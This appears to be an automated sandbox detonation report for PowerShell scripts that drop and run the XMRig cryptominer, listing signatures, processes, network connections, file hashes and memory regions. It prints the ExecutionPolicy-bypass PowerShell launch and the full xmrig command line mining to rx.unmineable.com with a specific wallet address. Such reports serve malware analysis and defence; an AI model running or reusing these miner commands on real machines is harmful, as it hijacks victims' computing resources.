memory/1980-69-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-70-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-71-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-72-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-73-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-74-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-75-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-76-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-77-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-78-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-79-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-80-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-81-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-82-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-83-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-84-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-85-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-86-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-87-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-88-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-89-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-90-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-91-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-92-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-93-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-94-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-95-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-96-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-97-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-98-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-99-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-100-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-101-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-102-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-103-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-104-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-105-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-106-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-107-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-108-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-109-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-110-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-111-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-112-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-113-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-114-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-115-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-116-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-117-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

memory/1980-118-0x00007FF7270F0000-0x00007FF727D23000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:24

Platform

win10v2004-20240508-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3772,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4752,i,14486271492189381216,15799931579469722648,262144 --variations-seed-version --mojo-platform-channel-handle=4792 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.187:443 www.bing.com tcp
US 8.8.8.8:53 187.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/748-0-0x00007FFF16A73000-0x00007FFF16A75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icfm5tsa.ibw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/748-7-0x000002016E360000-0x000002016E382000-memory.dmp

memory/748-11-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

memory/748-12-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

memory/748-14-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

memory/748-15-0x000002016E860000-0x000002016E872000-memory.dmp

memory/748-16-0x000002016E5F0000-0x000002016E5FA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4508-47-0x00000269D77D0000-0x00000269D77F0000-memory.dmp

memory/4508-48-0x00000269D7820000-0x00000269D7840000-memory.dmp

memory/4508-49-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-50-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/748-51-0x00007FFF16A73000-0x00007FFF16A75000-memory.dmp

memory/748-52-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

memory/4508-53-0x00000269D9110000-0x00000269D9130000-memory.dmp

memory/4508-54-0x00000269D7840000-0x00000269D7860000-memory.dmp

memory/4508-55-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/748-56-0x00007FFF16A70000-0x00007FFF17531000-memory.dmp

memory/4508-57-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-58-0x00000269D9110000-0x00000269D9130000-memory.dmp

memory/4508-59-0x00000269D7840000-0x00000269D7860000-memory.dmp

memory/4508-60-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-61-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-62-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-63-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-64-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-65-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-66-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-67-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-68-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-69-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-70-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-71-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-72-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-73-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-74-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-75-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-76-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-77-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-78-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-79-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-80-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-81-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-82-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-83-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-84-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-85-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-86-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-87-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-88-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-89-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-90-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-91-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-92-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-93-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-94-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-95-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-96-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-97-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-98-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-99-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-100-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-101-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-102-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-103-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-104-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-105-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-106-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-107-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-108-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-109-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-110-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-111-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-112-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-113-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-114-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-115-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-116-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-117-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

memory/4508-118-0x00007FF7A6640000-0x00007FF7A7273000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:25

Platform

win11-20240508-en

Max time kernel

1800s

Max time network

1794s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2624-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/2624-1-0x000002052C830000-0x000002052C852000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fypeibld.mhg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2624-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/2624-14-0x000002052CD20000-0x000002052CD32000-memory.dmp

memory/2624-15-0x000002052CAB0000-0x000002052CABA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3624-46-0x00000213A6E00000-0x00000213A6E20000-memory.dmp

memory/3624-47-0x00000213A6E50000-0x00000213A6E70000-memory.dmp

memory/3624-48-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/2624-49-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp

memory/3624-51-0x00000213A6EA0000-0x00000213A6EC0000-memory.dmp

memory/3624-50-0x00000213A6E70000-0x00000213A6E90000-memory.dmp

memory/3624-52-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/2624-53-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp

memory/3624-54-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-55-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-57-0x00000213A6EA0000-0x00000213A6EC0000-memory.dmp

memory/3624-56-0x00000213A6E70000-0x00000213A6E90000-memory.dmp

memory/3624-58-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-59-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-60-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-61-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-62-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-63-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-64-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-65-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-66-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-67-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-68-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-69-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-70-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-71-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-72-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-73-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-74-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-75-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-76-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-77-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-78-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-79-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-80-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-81-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-82-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-83-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-84-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-85-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-86-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-87-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-88-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-89-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-90-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-91-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-92-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-93-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-94-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-95-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-96-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-97-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-98-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-99-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-100-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-101-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-102-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-103-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-104-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-105-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-106-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-107-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-108-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-109-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-110-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-111-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-112-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-113-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-114-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-115-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

memory/3624-116-0x00007FF7443F0000-0x00007FF745023000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:30

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
